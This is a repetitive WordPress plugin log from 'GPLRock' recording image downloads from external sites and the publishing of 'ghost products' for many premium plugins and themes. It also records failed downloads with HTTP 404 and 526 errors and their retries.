GPLRock: Ghost product published with image - Product ID: wp-cost-estimation-payment-forms-builder [04-Apr-2026 08:45:06 UTC] GPLRock: Image downloaded successfully for product themify-builder-contact (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf69bf76.jpg [04-Apr-2026 08:45:06 UTC] GPLRock: Using pre-downloaded image for product themify-builder-contact: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf69bf76.jpg [04-Apr-2026 08:45:06 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-contact [04-Apr-2026 08:45:07 UTC] GPLRock: Image downloaded successfully for product geodirectory-wp-all-import (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e95941bb.jpg [04-Apr-2026 08:45:07 UTC] GPLRock: Using pre-downloaded image for product geodirectory-wp-all-import: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e95941bb.jpg [04-Apr-2026 08:45:07 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-wp-all-import [04-Apr-2026 08:45:09 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-points-and-rewards (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf278722.jpg [04-Apr-2026 08:45:09 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-points-and-rewards: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf278722.jpg [04-Apr-2026 08:45:09 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-points-and-rewards [04-Apr-2026 08:45:11 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-pdf-vouchers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7ee8b7a7.jpg [04-Apr-2026 08:45:11 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-pdf-vouchers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7ee8b7a7.jpg [04-Apr-2026 08:45:11 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-pdf-vouchers [04-Apr-2026 08:45:12 UTC] GPLRock: Image downloaded successfully for product searchwp-enable-media-replace-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7da9b73.jpg [04-Apr-2026 08:45:12 UTC] GPLRock: Using pre-downloaded image for product searchwp-enable-media-replace-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7da9b73.jpg [04-Apr-2026 08:45:12 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-enable-media-replace-integration [04-Apr-2026 08:45:13 UTC] GPLRock: Image downloaded successfully for product oceanwp-elementor-widgets (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9a704b3b.jpg [04-Apr-2026 08:45:13 UTC] GPLRock: Using pre-downloaded image for product oceanwp-elementor-widgets: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9a704b3b.jpg [04-Apr-2026 08:45:13 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-elementor-widgets [04-Apr-2026 08:45:15 UTC] GPLRock: Image downloaded successfully for product gravity-forms-multi-page-navigation (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2d9849ba.jpg [04-Apr-2026 08:45:15 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-multi-page-navigation: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2d9849ba.jpg [04-Apr-2026 08:45:15 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-multi-page-navigation [04-Apr-2026 08:45:17 UTC] GPLRock: Image downloaded successfully for product gravity-perks-media-library-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7337d08b.jpg [04-Apr-2026 08:45:17 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-media-library-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7337d08b.jpg [04-Apr-2026 08:45:17 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-media-library-plugin [04-Apr-2026 08:45:18 UTC] GPLRock: Image downloaded successfully for product gravity-forms-limit-dates (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2f12b67f.jpg [04-Apr-2026 08:45:18 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-limit-dates: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2f12b67f.jpg [04-Apr-2026 08:45:18 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-limit-dates [04-Apr-2026 08:54:19 UTC] GPLRock: Image download failed for product woocommerce-product-table (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:54:23 UTC] GPLRock: Image download failed for product woocommerce-product-table (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:54:27 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/WooCommerce-Product-Table.jpg for product woocommerce-product-table after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 08:54:29 UTC] GPLRock: Image download failed for product woocommerce-product-table (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:54:33 UTC] GPLRock: Image download failed for product woocommerce-product-table (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:54:39 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/WooCommerce-Product-Table.jpg for product woocommerce-product-table after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 08:54:39 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-table. URL: https://www.gplrock.com/wp-content/uploads/2020/07/WooCommerce-Product-Table.jpg [04-Apr-2026 08:54:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-table [04-Apr-2026 08:54:40 UTC] GPLRock: Image downloaded successfully for product woocommerce-waitlist (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a868b8eb.jpg [04-Apr-2026 08:54:40 UTC] GPLRock: Using pre-downloaded image for product woocommerce-waitlist: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a868b8eb.jpg [04-Apr-2026 08:54:40 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-waitlist [04-Apr-2026 08:54:41 UTC] GPLRock: Image downloaded successfully for product soflyy-wp-all-import-pro-advanced-custom-fields-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b02a7206.jpg [04-Apr-2026 08:54:41 UTC] GPLRock: Using pre-downloaded image for product soflyy-wp-all-import-pro-advanced-custom-fields-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b02a7206.jpg [04-Apr-2026 08:54:41 UTC] GPLRock: Ghost product published with image - Product ID: soflyy-wp-all-import-pro-advanced-custom-fields-addon [04-Apr-2026 08:54:44 UTC] GPLRock: Image download failed for product ultimate-addons-for-elementor (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:54:48 UTC] GPLRock: Image download failed for product ultimate-addons-for-elementor (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:54:52 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Ultimate-Addons-for-Elementor.jpg for product ultimate-addons-for-elementor after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 08:54:54 UTC] GPLRock: Image download failed for product ultimate-addons-for-elementor (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:54:58 UTC] GPLRock: Image download failed for product ultimate-addons-for-elementor (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:55:02 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Ultimate-Addons-for-Elementor.jpg for product ultimate-addons-for-elementor after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 08:55:02 UTC] GPLRock WARNING: Image download failed for product ultimate-addons-for-elementor. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Ultimate-Addons-for-Elementor.jpg [04-Apr-2026 08:55:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-addons-for-elementor [04-Apr-2026 08:55:04 UTC] GPLRock: Image downloaded successfully for product woocommerce-returns-and-warranty-requests (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf8ad1ea.jpg [04-Apr-2026 08:55:04 UTC] GPLRock: Using pre-downloaded image for product woocommerce-returns-and-warranty-requests: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf8ad1ea.jpg [04-Apr-2026 08:55:04 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-returns-and-warranty-requests [04-Apr-2026 08:55:05 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-add-ons (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93df9ccf.jpg [04-Apr-2026 08:55:05 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-add-ons: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93df9ccf.jpg [04-Apr-2026 08:55:05 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-add-ons [04-Apr-2026 08:55:07 UTC] GPLRock: Image downloaded successfully for product woocommerce-pre-orders (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d58cba04.jpg [04-Apr-2026 08:55:07 UTC] GPLRock: Using pre-downloaded image for product woocommerce-pre-orders: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d58cba04.jpg [04-Apr-2026 08:55:07 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-pre-orders [04-Apr-2026 08:55:08 UTC] GPLRock: Image downloaded successfully for product calendarista-premium-edition (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fbb3d188.jpg [04-Apr-2026 08:55:08 UTC] GPLRock: Using pre-downloaded image for product calendarista-premium-edition: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fbb3d188.jpg [04-Apr-2026 08:55:08 UTC] GPLRock: Ghost product published with image - Product ID: calendarista-premium-edition [04-Apr-2026 08:55:09 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-subscription-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-467f6192.jpg [04-Apr-2026 08:55:09 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-subscription-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-467f6192.jpg [04-Apr-2026 08:55:09 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-subscription-premium [04-Apr-2026 08:55:11 UTC] GPLRock: Image downloaded successfully for product savoy-minimalist-ajax-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-47bc5d1a.jpg [04-Apr-2026 08:55:11 UTC] GPLRock: Using pre-downloaded image for product savoy-minimalist-ajax-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-47bc5d1a.jpg [04-Apr-2026 08:55:11 UTC] GPLRock: Ghost product published with image - Product ID: savoy-minimalist-ajax-woocommerce-theme [04-Apr-2026 09:12:16 UTC] GPLRock: Image download failed for product darpan-news-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:18 UTC] GPLRock: Image download failed for product darpan-news-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/darpan---news-magazine-wordpress-theme-29386.webp for product darpan-news-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:12:20 UTC] GPLRock: Image download failed for product darpan-news-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:22 UTC] GPLRock: Image download failed for product darpan-news-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/darpan---news-magazine-wordpress-theme-29386.webp for product darpan-news-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:12:24 UTC] GPLRock WARNING: Image download failed for product darpan-news-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/darpan---news-magazine-wordpress-theme-29386.webp [04-Apr-2026 09:12:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: darpan-news-magazine-wordpress-theme [04-Apr-2026 09:12:24 UTC] GPLRock: Image download failed for product succulents-healthy-lifestyle-and-wellness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:26 UTC] GPLRock: Image download failed for product succulents-healthy-lifestyle-and-wellness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/succulents---healthy-lifestyle-and-wellness-wordpress-theme-17390.webp for product succulents-healthy-lifestyle-and-wellness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:12:29 UTC] GPLRock: Image download failed for product succulents-healthy-lifestyle-and-wellness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:31 UTC] GPLRock: Image download failed for product succulents-healthy-lifestyle-and-wellness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/succulents---healthy-lifestyle-and-wellness-wordpress-theme-17390.webp for product succulents-healthy-lifestyle-and-wellness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:12:33 UTC] GPLRock WARNING: Image download failed for product succulents-healthy-lifestyle-and-wellness-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/succulents---healthy-lifestyle-and-wellness-wordpress-theme-17390.webp [04-Apr-2026 09:12:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: succulents-healthy-lifestyle-and-wellness-wordpress-theme [04-Apr-2026 09:12:33 UTC] GPLRock: Image download failed for product smart-up-conference-event-management-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:35 UTC] GPLRock: Image download failed for product smart-up-conference-event-management-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smart-up---conference--event-management-wordpress-theme-26904.webp for product smart-up-conference-event-management-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:12:37 UTC] GPLRock: Image download failed for product smart-up-conference-event-management-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:39 UTC] GPLRock: Image download failed for product smart-up-conference-event-management-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smart-up---conference--event-management-wordpress-theme-26904.webp for product smart-up-conference-event-management-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:12:41 UTC] GPLRock WARNING: Image download failed for product smart-up-conference-event-management-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/smart-up---conference--event-management-wordpress-theme-26904.webp [04-Apr-2026 09:12:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smart-up-conference-event-management-wordpress-theme [04-Apr-2026 09:12:42 UTC] GPLRock: Image download failed for product camden-boutique-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:44 UTC] GPLRock: Image download failed for product camden-boutique-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/camden---boutique-store-wordpress-theme-4470.webp for product camden-boutique-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:12:46 UTC] GPLRock: Image download failed for product camden-boutique-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:48 UTC] GPLRock: Image download failed for product camden-boutique-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/camden---boutique-store-wordpress-theme-4470.webp for product camden-boutique-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:12:50 UTC] GPLRock WARNING: Image download failed for product camden-boutique-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/camden---boutique-store-wordpress-theme-4470.webp [04-Apr-2026 09:12:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: camden-boutique-store-wordpress-theme [04-Apr-2026 09:12:50 UTC] GPLRock: Image download failed for product concern-multipurpose-and-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:52 UTC] GPLRock: Image download failed for product concern-multipurpose-and-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/concern---multipurpose-and-portfolio-wordpress-theme-28038.webp for product concern-multipurpose-and-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:12:55 UTC] GPLRock: Image download failed for product concern-multipurpose-and-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:57 UTC] GPLRock: Image download failed for product concern-multipurpose-and-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:12:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/concern---multipurpose-and-portfolio-wordpress-theme-28038.webp for product concern-multipurpose-and-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:12:59 UTC] GPLRock WARNING: Image download failed for product concern-multipurpose-and-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/concern---multipurpose-and-portfolio-wordpress-theme-28038.webp [04-Apr-2026 09:12:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: concern-multipurpose-and-portfolio-wordpress-theme [04-Apr-2026 09:12:59 UTC] GPLRock: Image downloaded successfully for product corino-liquor-online-store-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0e079fcb.webp [04-Apr-2026 09:12:59 UTC] GPLRock: Using pre-downloaded image for product corino-liquor-online-store-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0e079fcb.webp [04-Apr-2026 09:12:59 UTC] GPLRock: Ghost product published with image - Product ID: corino-liquor-online-store-woocommerce-theme [04-Apr-2026 09:12:59 UTC] GPLRock: Image download failed for product organix-organic-food-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:01 UTC] GPLRock: Image download failed for product organix-organic-food-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organix---organic-food-woocommerce-wordpress-theme-15134.webp for product organix-organic-food-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:13:03 UTC] GPLRock: Image download failed for product organix-organic-food-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:05 UTC] GPLRock: Image download failed for product organix-organic-food-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organix---organic-food-woocommerce-wordpress-theme-15134.webp for product organix-organic-food-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:13:08 UTC] GPLRock WARNING: Image download failed for product organix-organic-food-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/organix---organic-food-woocommerce-wordpress-theme-15134.webp [04-Apr-2026 09:13:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: organix-organic-food-woocommerce-wordpress-theme [04-Apr-2026 09:13:08 UTC] GPLRock: Image download failed for product travellers-tour-travels-one-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:10 UTC] GPLRock: Image download failed for product travellers-tour-travels-one-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travellers---tour--travels-one-page-theme-9272.webp for product travellers-tour-travels-one-page-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:13:12 UTC] GPLRock: Image download failed for product travellers-tour-travels-one-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:14 UTC] GPLRock: Image download failed for product travellers-tour-travels-one-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travellers---tour--travels-one-page-theme-9272.webp for product travellers-tour-travels-one-page-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:13:16 UTC] GPLRock WARNING: Image download failed for product travellers-tour-travels-one-page-theme. URL: https://meldwp.com/wp-content/uploads/travellers---tour--travels-one-page-theme-9272.webp [04-Apr-2026 09:13:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travellers-tour-travels-one-page-theme [04-Apr-2026 09:13:17 UTC] GPLRock: Image download failed for product aoi-software-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:19 UTC] GPLRock: Image download failed for product aoi-software-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aoi---software--technology-wordpress-theme-4064.webp for product aoi-software-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:13:21 UTC] GPLRock: Image download failed for product aoi-software-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:23 UTC] GPLRock: Image download failed for product aoi-software-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aoi---software--technology-wordpress-theme-4064.webp for product aoi-software-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:13:25 UTC] GPLRock WARNING: Image download failed for product aoi-software-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aoi---software--technology-wordpress-theme-4064.webp [04-Apr-2026 09:13:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aoi-software-technology-wordpress-theme [04-Apr-2026 09:13:25 UTC] GPLRock: Image download failed for product craftis-handmade-handcraft-artisan-wordpress-theme-wcfm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:27 UTC] GPLRock: Image download failed for product craftis-handmade-handcraft-artisan-wordpress-theme-wcfm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/craftis---handmade-handcraft--artisan-wordpress-theme--wcfm-22367.webp for product craftis-handmade-handcraft-artisan-wordpress-theme-wcfm after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:13:30 UTC] GPLRock: Image download failed for product craftis-handmade-handcraft-artisan-wordpress-theme-wcfm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:32 UTC] GPLRock: Image download failed for product craftis-handmade-handcraft-artisan-wordpress-theme-wcfm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:13:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/craftis---handmade-handcraft--artisan-wordpress-theme--wcfm-22367.webp for product craftis-handmade-handcraft-artisan-wordpress-theme-wcfm after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:13:34 UTC] GPLRock WARNING: Image download failed for product craftis-handmade-handcraft-artisan-wordpress-theme-wcfm. URL: https://meldwp.com/wp-content/uploads/craftis---handmade-handcraft--artisan-wordpress-theme--wcfm-22367.webp [04-Apr-2026 09:13:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: craftis-handmade-handcraft-artisan-wordpress-theme-wcfm [04-Apr-2026 09:24:34 UTC] GPLRock: Image downloaded successfully for product soliloquy-pdf-slider-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4da8e036.jpg [04-Apr-2026 09:24:34 UTC] GPLRock: Using pre-downloaded image for product soliloquy-pdf-slider-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4da8e036.jpg [04-Apr-2026 09:24:34 UTC] GPLRock: Ghost product published with image - Product ID: soliloquy-pdf-slider-addon [04-Apr-2026 09:24:35 UTC] GPLRock: Image downloaded successfully for product ait-elements-toolkit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8208f817.jpg [04-Apr-2026 09:24:35 UTC] GPLRock: Using pre-downloaded image for product ait-elements-toolkit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8208f817.jpg [04-Apr-2026 09:24:35 UTC] GPLRock: Ghost product published with image - Product ID: ait-elements-toolkit [04-Apr-2026 09:24:40 UTC] GPLRock: Image downloaded successfully for product aelia-tax-display-by-country-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-69a85ee4.jpg [04-Apr-2026 09:24:40 UTC] GPLRock: Using pre-downloaded image for product aelia-tax-display-by-country-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-69a85ee4.jpg [04-Apr-2026 09:24:40 UTC] GPLRock: Ghost product published with image - Product ID: aelia-tax-display-by-country-for-woocommerce [04-Apr-2026 09:24:41 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media-watermark (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7b613548.jpg [04-Apr-2026 09:24:41 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media-watermark: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7b613548.jpg [04-Apr-2026 09:24:41 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media-watermark [04-Apr-2026 09:24:43 UTC] GPLRock: Image downloaded successfully for product mythemeshop-bloggingbox-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b4d19322.jpg [04-Apr-2026 09:24:43 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-bloggingbox-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b4d19322.jpg [04-Apr-2026 09:24:43 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-bloggingbox-wordpress-theme [04-Apr-2026 09:24:45 UTC] GPLRock: Image downloaded successfully for product crux-a-modern-and-lightweight-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-13c06289.jpg [04-Apr-2026 09:24:45 UTC] GPLRock: Using pre-downloaded image for product crux-a-modern-and-lightweight-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-13c06289.jpg [04-Apr-2026 09:24:45 UTC] GPLRock: Ghost product published with image - Product ID: crux-a-modern-and-lightweight-woocommerce-theme [04-Apr-2026 09:24:46 UTC] GPLRock: Image downloaded successfully for product ultimate-member-realtime-notifications-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84f78b00.jpg [04-Apr-2026 09:24:46 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-realtime-notifications-addon: 